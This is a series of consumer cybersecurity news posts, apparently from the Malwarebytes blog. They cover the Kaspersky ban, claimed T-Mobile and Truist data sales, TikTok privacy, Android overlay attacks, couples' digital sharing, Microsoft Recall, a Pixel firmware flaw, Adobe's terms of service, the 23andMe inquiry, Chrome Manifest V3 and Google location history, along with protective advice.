The ban, first reported by Reuters and released Thursday, includes “AO Kaspersky Lab,” “OOO Kaspersky Group,” and “Kaspersky Labs Limited.”

According to the US Department of Commerce, all three Kaspersky entities are being banned “for their cooperation with Russian military and intelligence authorities in support of the Russian government’s cyber intelligence objectives.”

In October 2017, The New York Times reported that Israeli intelligence officers managed to catch Russian government hackers using Kaspersky to conduct clandestine searches across the globe. That reporting followed a bombshell investigation from The Wall Street Journal that claimed that Russian hackers stole classified NSA materials from a contractor’s personal computer which had Kaspersky software installed on it.

That reported hacking incident allegedly resulted in the US government’s decision that same year to remove Kaspersky antivirus software from US government devices.

In the same Thursday briefing call, Secretary Raimondo cited the threat of Russian influence in the Department’s decision to ban Kaspersky:

“Russia has shown it has the capacity and… the intent to exploit Russian companies like Kaspersky to collect and weaponize the personal information of Americans and that is why we are compelled to take the action that we are taking today.”

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Was T-Mobile compromised by a zero-day in Jira?

A moderator of the notorious data breach trading platform BreachForums is offering data for sale they claim comes from a data breach at T-Mobile.

The moderator, going by the name of IntelBroker, describes the data as containing source code, SQL files, images, Terraform data, certifications, and “Siloprograms.” (We’ve not heard of siloprograms, and can’t find a reference to them anywhere, so perhaps it’s a mistranslation or typo.)

post offereing data for sale supposedly from a T-Mobile internal breach
Post offereing data for sale supposedly from a T-Mobile internal breach

To prove they had the data, IntelBroker posted several screenshots showing access with administrative privileges to a Confluence server and T-Mobile’s internal Slack channels for developers.

But according to sources known to BleepingComputer, the data shared by IntelBroker actually consists of older screenshots. These screenshots show T-Mobile’s infrastructure, posted at a known—yet unnamed—third-party vendor’s servers, from where they were stolen.

When we looked at the screenshots IntelBroker attached to their post, we spotted something interesting in one of them.

search for vulnerability
Found CVE-2024-1597

This screenshot shows a search query for a critical vulnerability in Jira, a project management tool used by teams to plan, track, release and support software. It’s typically a place where you could find the source code of works in progress.

The search returns the result CVE-2024-1597, a SQL injection vulnerability. SQL injection happens when a cybercriminal injects malicious SQL code into a form on a website, such as a login page, instead of the data the form is asking for. The vulnerability affects Confluence Data Center and Server according to Atlassian’s May security bulletin.

For a better understanding, it’s important to note that Jira and Confluence are both products created by Atlassian, where Jira is the project management and issue tracking tool and Confluence is the collaboration and documentation tool. They are often used together.

If IntelBroker has a working exploit for the SQL injection vulnerability, this could also explain their claim that they have the source code of three internal tools used at Apple, including a single sign-on authentication system known as AppleConnect.

This theory is supported by the fact that IntelBroker is also offering a Jira zero-day for sale.

IntelBroker offering zero-day for JIra for sale
IntelBroker selling zero-day for JIra

“I’m selling a zero-day RCE for Atlassian’s Jira.

Works for the latest version of the desktop app, as well as Jira with confluence.

No login is required for this, and works with Okta SSO.”

If this is true then this exploit, or its fruits, might be used for data breaches that involve personal data.

Meanwhile, T-Mobile has denied it has suffered a breach, saying it is investigating whether there has been a breach at a third-party provider.

“We have no indication that T-Mobile customer data or source code was included and can confirm that the bad actor’s claim that T-Mobile’s infrastructure was accessed is false.”

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

TikTok facing fresh lawsuit in US over children’s privacy

The Federal Trade Commission (FTC) has announced it’s referred a complaint against TikTok and parent company ByteDance to the Department of Justice.

The investigation originally focused on which was acquired by ByteDance on November 10, 2017, and merged it into TikTok.

The FTC started a compliance review of following a 2019 settlement with the company for violations of the Children’s Online Privacy Protection Act (COPPA). In the settlement, received a fine of $5.7m for collecting personal information from children without parental consent.

One of the main concerns was that did not ask the user’s age and later failed to go back and request age information for people who already had accounts.

COPPA requires sites and services like and TikTok – among other things – to get parental consent before collecting personal information from children under 13. also failed to deal with complaints properly. The FTC found that—in just a two-week period in September 2016—the company received over 300 complaints from parents asking to delete their child’s account. However, under COPPA it’s not enough just to delete existing accounts, companies have to remove the kids’ videos and profiles from the company’s servers; failed to do this.

In 2022, TikTok itself faced a $28m fine for failing to protect children’s privacy after an investigation of a possible breach of the UK’s data protection laws.

In the US, TikTok agreed to pay $92 million in 2021 to settle dozens of lawsuits alleging that it harvested personal data from users, including information using facial recognition technology, without consent, and shared the data with third parties.

The FTC states that during the investigation it uncovered reasons to believe that “defendants are violating or are about to violate the law and that a proceeding is in the public interest.”

The FTC also said it usually doesn’t publicize the referral of complaints but feels it is in the public interest to do so now.

TikTok has been in the crosshairs of privacy and security professionals and politicians for years.

In June 2022,  the FCC (Federal Communications Commission), called on the CEOs of Apple and Google to remove TikTok from their app stores considering it an unacceptable national security risk because of its Chinese ownership.

In 2023, General Paul Nakasone, Director of the National Security Agency (NSA) referred to TikTok as a loaded gun in the hands of America’s TikTok-addicted youth.

Recently, we reported about the take-over of some high-profile TikTok accounts just by opening a Direct Message.

And the clock is ticking when it comes to TikTok’s presence in the US, after the US Senate has approved a bill that would effectively ban TikTok from the US unless Chinese owner ByteDance gives up its share of the still immensely popular app.

Somehow we don’t think we’ve heard the last of this.

Check your digital footprint

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

Explained: Android overlays and how they are used to trick people

Sometimes you’ll see the term “overlays” used in articles about malware and you might wonder what they are. In this post we will try to explain what overlays—particularly on Android devices—are, and how cybercriminals deploy them.

Most of the time, overlays are used to make people think they are visiting a legitimate website or using a trusted app while in reality they are not.

Simply put, the Android overlay is a feature used by an app to appear on top of another app. The legitimate use of overlays is to offer functionality to the app’s user without them having to leave the app itself, for example for messages or alerts, such as Android bubbles on Messenger.

The possible malicious use of overlays, then, is not hard to guess. Overlays can be used to draw a full window on top of a legitimate app and, as such, intercept all the interactions the user has with the app. But they can also be superimposed over certain critical areas of an app like the text in a message box.

Some examples of malicious uses of overlays:

  • Requesting permissions under false pretenses, malicious apps can hide their requests by covering the legitimate app’s permissions text.
  • Clickjacking, where a user is tricked into clicking on actionable content thinking they are interacting with a legitimate app.
  • Intercepting information like login credentials and even some multi-factor authentication (MFA) tokens, by making the user think they are entering them on a legitimate app or website.

Whether the overlays are transparent or whether they mimic the legitimate app does not influence the way they work. As long as they blend with the original application’s interface, they are incredibly hard to spot.

Most of the time, a malicious overlay’s goal is to intercept certain user data which enables cybercriminals to steal money or cryptocurrencies. This is why many banking apps have protection in place. In modern Android versions, developers can successfully block any non-system Android overlay to protect against overlay attacks.

Protection against overlays

As we said, screen overlay attacks are most common on Android devices, and they are a significant threat, so we will explain how you can check which apps have the permission to use overlays and how you can disable it.

Tap Settings > Apps > Options (three stacked dots) > Special access > Appear on top. Here you can see a list of apps with the permission to “Appear on top” and you can disable the ones you don’t recognize or don’t need to have this permission.

Using an anti-malware solution for your Android device will be effective against known malicious apps. You can uninstall these apps using the mobile device’s uninstall functionality, but the tricky part lies in identifying the offending behavior and app. That is where Malwarebytes for Android can help—by identifying these apps and removing them.

It also helps to use authentication methods which are harder to phish. MFA is vital to enable, and will protect you from many types of attacks, so please continue to use it. However, authentication-in-the-middle attacks only work with certain types of MFA, and passkeys for example won’t allow the cybercriminals to login to your account in this way.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

43% of couples experience pressure to share logins and locations, Malwarebytes finds

All isn’t fair in love and romance today, as 43% of people in a committed relationship said they have felt pressured by their own partners to share logins, passcodes, and/or locations. A worrying 7% admitted that this type of pressure has included the threat of breaking up or the threat of physical or emotional harm.

These are latest findings from original research conducted by Malwarebytes to explore how romantic couples navigate shared digital access to one another’s devices, accounts, and location information.

In short, digital sharing is the norm in modern relationships, but it doesn’t come without its fears.

While everybody shares some type of device, account, or location access with their significant other (100% of respondents), and plenty grant their significant other access to at least one personal account (85%), a sizeable portion longs for something different—31% said they worry about “how easy it is for my partner to track what I’m doing and where I am all times because of how much we share,” and 40% worry that “telling my partner I don’t want to share logins, PINs, and/or locations would upset them.”

By surveying 500 people in committed relationships in the United States, Malwarebytes has captured a unique portrait of what it means to date, marry, and be in love in 2024—a part of life that is now inseparable from smart devices, apps, and the internet at large.

The complete findings can be found in the latest report, “What’s mine is yours: How couples share an all-access pass to their digital lives.” You can read the full report below.

Here are some of the key findings:

  • Partners share their personal login information for an average of 12 different types of accounts.
  • 48% of partners share the login information of their personal email accounts.
  • 30% of partners regret sharing location tracking.
  • 18% of partners regret sharing account access. The number is significantly higher for men (30%).
  • 29% of partners said an ex-partner used their accounts to track their location, impersonate them, access their financial accounts, and other harms.
  • Around one in three Gen Z and Millennial partners report an ex has used their accounts to stalk them.

But the data doesn’t only point to causes for concern. It also highlights an opportunity for learning. As Malwarebytes reveals in this latest research, people are looking for guidance, with seven in 10 people admitting they want help navigating digital co-habitation.

According to one Gen Z survey respondent:

“I feel like it might take some effort (to digitally disentangle) because we are more seriously involved. We have many other kinds of digital ties that we would have to undo in order to break free from one another.”

That is why, today, Malwarebytes is also launching its online resource hub: Modern Love in the Digital Age. At this new guidance portal, readers can learn about whether they should share their locations with their partners, why car location tracking presents a new problem for some couples, and how they can protect themselves from online harassment. Access the hub below.

(Almost) everything you always wanted to know about cybersecurity, but were too afraid to ask, with Tjitske de Vries: Lock and Code S05E13

This week on the Lock and Code podcast…

🎶 Ready to know what Malwarebytes knows?
Ask us your questions and get some answers.
What is a passphrase and what makes it—what’s the word?

Every day, countless readers, listeners, posters, and users ask us questions about some of the most commonly cited topics and terminology in cybersecurity. What are passkeys? Is it safer to use a website or an app? How can I stay safe from a ransomware attack? What is the dark web? And why can’t cybercriminals simply be caught and stopped?

For some cybersecurity experts, these questions may sound too “basic”—easily researched online and not worth the time or patience to answer. But those experts would be wrong.

In cybersecurity, so much of the work involves helping people take personal actions to stay safe online. That means it’s on cybersecurity companies and practitioners to provide clarity when the public is asking for it.  it’s on us to provide clarity. Without this type of guidance, people are less secure, scammers are more successful, and clumsy, fixable mistakes are rarely addressed.

This is why, this summer, Malwarebytes is working harder on meeting people where they are. For weeks, we’ve been collecting questions from our users about WiFi security, data privacy, app settings, device passcodes, and identity protection.

All of these questions—no matter their level of understanding—are appreciated, as they help the team at Malwarebytes understand where to improve its communication. In cybersecurity, it is critical to create an environment where, for every single person seeking help, it’s safe to ask. It’s safe to ask what’s on their mind, safe to ask what confuses them, and safe to ask what they might even find embarrassing.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Malwarebytes Product Marketing Manager Tjitske de Vries about the modern rules around passwords, the difficulties of stopping criminals on the dark web, and why online scams hurt people far beyond their financial repercussions.

“We had [an] 83-year-old man who was afraid to talk to his wife for three days because he had received… a sextortion scam… This is how they get people, and it’s horrible.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (
Licensed under Creative Commons: By Attribution 4.0 License
Outro Music: “Good God” by Wowa (

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Microsoft Recall delayed after privacy and security concerns

Microsoft has announced it will postpone the broadly available preview of the heavily discussed Recall feature for Copilot+ PCs. Copilot+ PCs are personal computers that come equipped with several artificial intelligence (AI) features.

The Recall feature tracks anything from web browsing to voice chats. The idea is that Recall can assist users to reconstruct past activity by taking regular screenshots of a user’s activity and storing them locally. The user would then be able to search the database for anything they’ve seen on their PC.

However, Recall received heavy criticism by security researchers and privacy advocates since it was announced last month. The ensuing discussion saw a lot of contradictory statements. For example, Microsoft claimed that Recall would be disabled by default, while the original documentation said otherwise.

Researchers demonstrated how easy it was to extract and search through Recall snapshots on a compromised system. While some may remark that the compromised system is the problem in that equation—and they are not wrong—Recall would potentially provide an attacker with a lot of information that normally would not be accessible. Basically, it would be a goldmine that spyware and information stealers could easily access and search.

In Microsoft’s own words:

“Recall does not perform content moderation. It will not hide information such as passwords or financial account numbers. That data may be in snapshots that are stored on your device, especially when sites do not follow standard internet protocols like cloaking password entry.”

Microsoft didn’t see the problem, with its vice chair and president, Brad Smith even using Recall as an example to demonstrate how Microsoft is secure during the Committee Hearing: A Cascade of Security Failures: Assessing Microsoft Corporation’s Cybersecurity Shortfalls and the Implications for Homeland Security.

But now things have changed, and Recall will now only be available for participants in the Windows Insider Program (WIP) in the coming weeks, instead of being rolled out to all Copilot+ PC users on June 18 as originally planned.

Another security measure taken only as an afterthought was that users will now have to log into Windows Hello in order to activate Recall and to view your screenshot timeline.

In its blog, Microsoft indicates it will act on the feedback it expects to receive from WIP users.

“This decision is rooted in our commitment to providing a trusted, secure and robust experience for all customers and to seek additional feedback prior to making the feature available to all Copilot+ PC users.”

Our hope is that the WIP community will convince Microsoft to abandon the whole Recall idea. If not, we will make sure to let you know how you can disable it or use it more securely if you wish to do so.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Truist bank confirms data breach

On Wednesday June 12, 2024, a well-known dark web data broker and cybercriminal acting under the name “Sp1d3r” offered a significant amount of data allegedly stolen from Truist Bank for sale.

Truist is a US bank holding company and operates 2,781 branches in 15 states and Washington DC. By assets, it is in the top 10 of US banks. In 2020, Truist provided financial services to about 12 million consumer households.

The online handle of the seller immediately raised the suspicion that this was yet another Snowflake related data breach.

Sp1d3r offering Truist bank data for sale
Post by Sp1d3r on breach forum

The post also mentions Suntrust bank because Truist Bank arose after SunTrust Banks and BB&T (Branch Banking and Trust Company) merged in December 2019.

For the price of $1,000,000, other cybercriminals can allegedly get their hands on:

  • Employee Records: 65,000 records containing detailed personal and professional information.
  • Bank Transactions: Data including customer names, account numbers, and balances.
  • IVR Source Code: Source code for the bank’s Interactive Voice Response (IVR) funds transfer system.

IVR is a technology that allows telephone users to interact with a computer-operated telephone system through the use of voice and Dual-tone multi-frequency signaling (DTMF aka Touch-Tone) tones input with a keypad. Access to the source code may enable criminals to find security vulnerabilities they can abuse.

Given the source and the location where the data were offered, we decided at the time to keep an eye on things but not actively report on it. But now a spokesperson for Truist Bank told BleepingComputer:

“In October 2023, we experienced a cybersecurity incident that was quickly contained.”

Further, the spokesperson stated that after an investigation, the bank notified a small number of clients and denied any connection with Snowflake.

“That incident is not linked to Snowflake. To be clear, we have found no evidence of a Snowflake incident at our company.”

But the bank disclosed that based on new information that came up during the investigation, it has started another round of informing affected customers.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your exposure

While matters are still unclear how much information was involved, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Update now! Google Pixel vulnerability is under active exploitation

Google has notified Pixel users about an actively exploited vulnerability in their phones’ firmware.

Firmware is the code or program which is embedded into hardware devices. Simply put, it is the software layer between the hardware and the applications on the device.

About the vulnerability, Google said there are indications it may be:

“under limited, targeted exploitation.”

This could mean that the discovered attacks were very targeted, for example by state-sponsored actors or industry-grade spyware. However, it’s still a good idea to get these patches as soon as you can. And whether you have a Pixel or not, all Android users should make sure they’re using the latest version available, because the June 2024 security update addresses a total of 50 security vulnerabilities.

Updates to address this issue are available for supported Pixel devices, such as Pixel 5a with 5G, Pixel 6a, Pixel 6, Pixel 6 Pro, Pixel 7, Pixel 7 Pro, Pixel 7a, Pixel 8, Pixel 8 Pro, Pixel 8a, and Pixel Fold.

For these Google devices, security patch levels of 2024-06-05 or later address this issue. You can find your device’s Android version number, security update level, and Google Play system level in your Settings app.

You should get notifications when updates are available for you, but it’s not a bad idea to manually check for updates. For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

Technical details

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE for this vulnerability is:

CVE-2024-32896: an elevation of privilege (EoP) issue in Pixel firmware.

An elevation of privilege vulnerability occurs when an application gains permissions or privileges that should not be available to them. This can be a key element in an attack chain when a cybercriminal wants to move forward from initial access to a device to a full compromise.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Adobe clarifies Terms of Service change, says it doesn’t train AI on customer content

Following days of user pushback that included allegations of forcing a “spyware-like” Terms of Service (ToS) update into its products, design software giant Adobe explained itself with several clarifications.

Apparently, the concerns raised by the community, especially among Photoshop and Substance 3D users, caused the company to reflect on the language it used in the ToS. The adjustments that Adobe announced earlier this month suggested that users give the company unlimited access to all their materials—including materials covered by company Non-Disclosure Agreements (NDAs)—for content review and similar purposes.

As Adobe included in its Terms of Service update:

“As a Business User, you may have different agreements with or obligations to a Business, which may affect your Business Profile or your Content. Adobe is not responsible for any violation by you of such agreements or obligations.

This wording immediately sparked the suspicion that the company intends to use user-generated content to train its AI models. In particular, users balked at the following language:

“[.] you grant us a non-exclusive, worldwide, royalty-free sublicensable, license, to use, reproduce, publicly display, distribute, modify, create derivative works based on, publicly perform, and translate the Content.”

To reassure these users, on June 10, Adobe explained:

“We don’t train generative AI on customer content. We are adding this statement to our Terms of Use to reassure people that is a legal obligation on Adobe. Adobe Firefly is only trained on a dataset of licensed content with permission, such as Adobe Stock, and public domain content where copyright has expired.”

Alas, several artists found images that reference their work on Adobe’s stock platform.

As we have explained many times, the length and the use of legalese in the ToS does not do either the user or the company any favors. It seems that Adobe understands this now as well.

“First, we should have modernized our Terms of Use sooner. As technology evolves, we must evolve the legal language that evolves our policies and practices not just in our daily operations, but also in ways that proactively narrow and explain our legal requirements in easy-to-understand language.”

Adobe also said in its blog post that it realized it has to earn the trust of its users and is taking the feedback very seriously and it will be grounds to discuss new changes. Most importantly it wants to stress that you own your content, you have the option to opt out of the product improvement program, and that Adobe does not scan content stored locally on your computer.

Adobe expects to roll out new terms of service on June 18th and aims to better clarify what Adobe is permitted to do with its customers’ work. This is a developing story, and we’ll keep you posted.

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Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

23andMe data breach under joint investigation in two countries

The British and Canadian privacy authorities have announced they will undertake a joint investigation into the data breach at global genetic testing company 23andMe that was discovered in October 2023.

On Friday October 6, 2023, 23andMe confirmed via a somewhat opaque blog post that cybercriminals had “obtained information from certain accounts, including information about users’ DNA Relatives profiles.”

Later, an investigation by 23andMe showed that an attacker was able to directly access the accounts of roughly 0.1% of 23andMe’s users, which is about 14,000 of its 14 million customers. The attacker accessed the accounts using credential stuffing which is where someone tries existing username and password combinations to see if they can log in to a service. These combinations are usually stolen from another breach and then put up for sale on the dark web. Because people often reuse passwords across accounts, cybercriminals buy those combinations and then use them to login on other services and platforms.

For a subset of these accounts, the stolen data contained health-related information based on the user’s genetics.

The finding that most data was accessed through credential stuffing led to 23andMe sending a letter to legal representatives of victims blaming the victims themselves.

Privacy Commissioner of Canada Philippe Dufresne and UK Information Commissioner John Edwards say they will investigate the 23andMe breach jointly, leveraging the combined resources and expertise of their two offices.

The privacy watchdogs are going to investigate:

  • the scope of information that was exposed by the breach and potential harms to affected individuals;
  • whether 23andMe had adequate safeguards to protect the highly sensitive information within its control; and
  • whether the company provided adequate notification about the breach to the two regulators and affected individuals as required under Canadian and UK privacy and data protection laws.               

The joint investigation will be conducted in accordance with the Memorandum of Understanding between the ICO and OPC.

Scan for your exposed personal data

You can check what personal information of yours has been exposed online with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report. If your data was part of the 23andMe breach, we’ll let you know.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

When things go wrong: A digital sharing warning for couples

“When things go wrong” is a troubling prospect for most couples to face, but the internet—and the way that romantic partners engage both with and across it—could require that this worst-case scenario become more of a best practice.

In new research that Malwarebytes will release this month, romantic partners revealed that the degree to which they share passwords, locations, and devices with one another can invite mild annoyances—like having an ex mooch off a shared Netflix account—serious invasions of privacy—like being spied on through a smart doorbell—and even stalking and abuse.

Importantly, this isn’t just about jilted exes. This is also about people in active, committed relationships who have been pressured or forced into digital sharing beyond their limit.

The proof is in the data.

When Malwarebytes surveyed 500 people in committed relationships, 30% said they regretted sharing location tracking with their partner, 27% worried about their partners tracking them through location-based apps and services, and 23% worried that their current partner had accessed their accounts without their permission.

Plenty of healthy, happy relationships share digital access through trust and consent. For those couples, mapping out how to digitally separate and insulate their accounts from one another “when things go wrong” could seem misguided.

But for the many spouses, girlfriends, boyfriends, and partners who do not fully trust their significant other—or who are still figuring out how much to trust someone new—this exercise should serve as an act of security.

Here’s what people can think about when working through just how much of their digital lives to share.

Inconvenient, annoying, and just plain bothersome

A great deal of digital sharing within couples occurs on streaming platforms. One partner has Netflix, the other has Hulu, the two share Disney+, and years down the line, the couple can’t quite tell who is in charge of Apple Music and who is supposed to cancel the one-week free trial to Peacock.

This logistical nightmare, already difficult for people who are not in a committed relationship, is further complicated after a breakup (or during the relationship if one partner is particularly sensitive about their weekly algorithmic recommendations from Spotify).

If an ex maintains access to your streaming accounts even after a breakup, there’s little chance for abuse, but the situation can be aggravating. Maybe you don’t want your ex to know that you’re watching corny rom-coms, or that you’re absolutely going through it on your seventh replay of Spotify’s “Angry Breakup Mix.” These are valid annoyances that will require a password reset to boot your ex out of the shared account.

But there’s one type of shared account that should raise more caution than those listed above: A shared online shopping account, like Amazon.

With access to a shared online shopping account, a spiteful ex could purchase goods using your saved credit card. They could also keep updates on your location should you ever move and change addresses in the app. This isn’t the same threat as an ex having your real-time location, but for some individuals—particularly survivors of domestic abuse who have escaped their partner—any leak of a new address presents a major risk.

Non-consensual tracking, monitoring, and spying

When couples move into the same home, it can make sense to start sharing a variety of location-based apps.

Looking for a vacation rental online for your next getaway? You’re (hopefully) lodging together. Ordering delivery because nobody wants to make dinner? That order is being sent to the same shared address. Even some credit cards offer specific bonuses on services like Lyft, incentivizing some couples to rely more heavily on one account to score extra credits.

While sharing access between these types of accounts can increase efficiency, it’s important to know—and this may sound obvious—that many of these same shared location-based apps can reveal locations to a romantic partner, even after a breakup.

Your vacation could be revealed to an ex who is abusing their previously shared login privileges into services like Airbnb or Vrbo, or by someone peering into the trip history of a shared Uber account that discloses that a car was recently taken to the airport. Food delivery apps, similarly, can reveal new addresses after a move—a particular risk for survivors of domestic abuse who are trying to escape their physical situation.

In fact, any account that tracks and provides access to location—including Google’s own “Timeline” feature and fitness tracking devices made by Strava—could, in the wrong hands, become a security risk for stalking and abuse.

The vulnerabilities extend farther.

With the popularity of Internet of Things devices like smart doorbells and baby monitors, some partners may want to consider how safe they are from spying in their own homes. Plenty of user posts on a variety of community forums claim that exes and former spouses weaponized video-equipped doorbells and baby monitors to spy on a partner.

These scenarios are frightening, but they are part of a larger question about whether you should share your location with your partner. With the proper care and discussion, your location-sharing will be consensual, respected, and convenient for all.

Stalking and abuse

When discussing the risks around digital sharing between couples, it’s important to clarify that trustworthy partners do not become abusive simply because of their access to technology. A shared food delivery app doesn’t guarantee that a partner will be spied on. A baby monitor with a live video stream is sometimes just that—a baby monitor.

But many of the stories shared here expose the dangers that lie within arm’s reach for abusive partners. The technology alone cannot be blamed for the abuse. Instead, the technology must be scrutinized simply because of its ubiquitous use in today’s world.

The most serious concerns regarding digital access are the potential for stalking and abuse.

For partners that share devices and device passcodes, the notorious threat of stalkerware makes it easy for an abusive partner to pry into a person’s photos, videos, phone calls, text messages, locations, and more. Stalkerware can be installed on a person’s device in a matter of minutes—a low barrier of entry for couples that live with one another and who share each other’s device passcodes.

For partners who share a vehicle, a recent problem has emerged. In December, The New York Times reported on the story of a woman who—despite obtaining a restraining order against her ex-husband—could not turn off her shared vehicle’s location tracking. Because the car was in her husband’s name, he was able to reportedly continue tracking and harassing her.

Even shared smart devices have become a threat. According to reporting from The New York Times in 2018, survivors of domestic abuse began calling support lines with a bevvy of new concerns within their homes:

“One woman had turned on her air-conditioner, but said it then switched off without her touching it. Another said the code numbers of the digital lock at her front door changed every day and she could not figure out why. Still another told an abuse help line that she kept hearing the doorbell ring, but no one was there.”

The survivors’ stories all pointed to the abuse of shared smart devices.

Whereas the solutions to many of the inconveniences and annoyances that can come with shared digital access are simple—a reset password, a removal of a shared account—the “solutions” for technology-enabled abuse are far more complex. These are problems that cannot be solely addressed with advice and good cybersecurity hygiene.

If you are personally experiencing this type of harassment, you can contact the National Network to End Domestic Violence on their hotline at 1-800-799-SAFE.

Making sure things go right

Sharing your life with your partner should be a function of trust, and for many couples, it is. But, in the same way that it is impossible for a cybersecurity company to ignore even one ransomware attack, it’s also improper for this cybersecurity and privacy company to ignore the reality facing many couples today.

There are new rules and standards for digital access within relationships. With the right information and the right guidance, hopefully more people will feel empowered to make the best decisions for themselves.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Google’s Chrome changes make life harder for ad blockers

Despite protests, Google is rolling out changes in the Chrome browser that make it harder for ad blockers to do their job.

Starting last Monday, June 3, 2024, Chrome Beta, Dev, and Canary channels will see the effects of the implementation of the new extension platform Manifest V3. The gradual disabling of V2 extensions will later follow for all Chrome users.

For those not familiar with the terms, Manifest V2 and V3 are the “rules” that browser extension developers are required to follow if they want their extensions to get accepted into the Google Play Store.

Manifest V2 is the old model. The Chrome Web Store no longer accepts Manifest V2 extensions, but browsers can still use them. For now. Google explained that the goal of the new extension platform:

“Is to protect existing functionality while improving the security, privacy, performance and trustworthiness of the extension ecosystem as a whole.”

That’s commendable, because it stops criminals from hiding the malicious intentions of their extensions when they submit them for the Google Play Store.

However, the part of the transition that hinders ad blockers lies in the fact that extensions will now have limitations on how many rules they include. Google has made some compromises after initial objections, but the limitations are still present and have a large effect on ad blockers since they historically rely on a large number of rules. That’s because, generally speaking, each blocked domain or subdomain is one rule, and cybercriminals set up new domains by the dozen.

Google has tried to address developers’ concerns by adding support for user scripts and increasing the number of rulesets for the API used by ad blocking extensions. But this might not be enough.

Users can temporarily re-enable their Manifest V2 extensions, but this option will eventually disappear.

One of the affected ad blockers is the one incorporated in our own Malwarebytes Browser Guard.

We talked to one of the developers about the plans for Browser Guard and how it will deal with the Manifest V3 rules. They told us that the new Browser Guard, which is already available in beta, will use a mix of static and dynamic rules to protect our users.

Static rules are rules that are contained in the ruleset files which can be seen as block lists. These files are declared in the manifest file.

Dynamic rules are rules that can be added and removed at runtime. Chrome allows up to 30k dynamic rules. Browser Guard uses dynamic rules for two purposes:

  • Session rules are dynamic rules that can be added and removed at runtime, but they are session-scoped and are cleared when the browser shuts down and when a new version of the browser is installed.
  • And dynamic rules can be used to store allow lists, user blocked content, and general rules that block more than one domain. Take, for example, the IP address of a server that is known to host nothing but phishing sites.

And, to deal with urgent situations, we can use ruleset overrides, which are a mechanism by which we can override the static rules shipped with Browser Guard without requiring our users to add exclusions.

If you want to help Malwarebytes get ready for the transition, you can test the beta version of Browser Guard for Manifest V3.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Google will start deleting location history

Google announced that it will reduce the amount of personal data it is storing by automatically deleting old data from “Timeline”—the feature that, previously named “Location History,” tracks user routes and trips based on a phone’s location, allowing people to revisit all the places they’ve been in the past.

In an email, Google told users that they will have until December 1, 2024 to save all travels to their mobile devices before the company starts deleting old data. If you use this feature, that means you have about five months before losing your location history.

Moving forward, Google will link the Location information to the devices you use, rather than to the user account(s). And, instead of backing up your data to the cloud, Google will soon start to store it locally on the device.

As I pointed out years ago, Location History allowed me to “spy” on my wife’s whereabouts without having to install anything on her phone. After some digging, I learned that my Google account was added to my wife’s phone’s accounts when I logged in on the Play Store on her phone. The extra account this created on her phone was not removed when I logged out after noticing the tracking issue.

That issue should be solved by implementing this new policy. (Let’s remember, though, that this is an issue that Google formerly considered a feature rather than a problem.)

Once effective, unless you take action and enable the new Timeline settings by December 1, Google will attempt to move the past 90 days of your travel history to the first device you sign in to your Google account on. If you want to keep using Timeline:

  • Open Google Maps on your device.
  • Tap your profile picture (or initial) in the upper right corner.
  • Choose Your Timeline.
  • Select whether to keep you want to keep your location data until you manually delete it or have Google auto-delete it after 3, 18, or 36 months.

In April of 2023, Google Play launched a series of initiatives that gives users control over the way that separate, third-party apps stored data about them. This was seemingly done because Google wanted to increase transparency and control mechanisms for people to control how apps would collect and use their data.

With the latest announcement, it appears that Google is finally tackling its own apps.

Only recently, Google agreed to purge billions of records containing personal information collected from more than 136 million people in the US surfing the internet using its Chrome web browser. But this was part of a settlement in a lawsuit accusing the search giant of illegal surveillance.

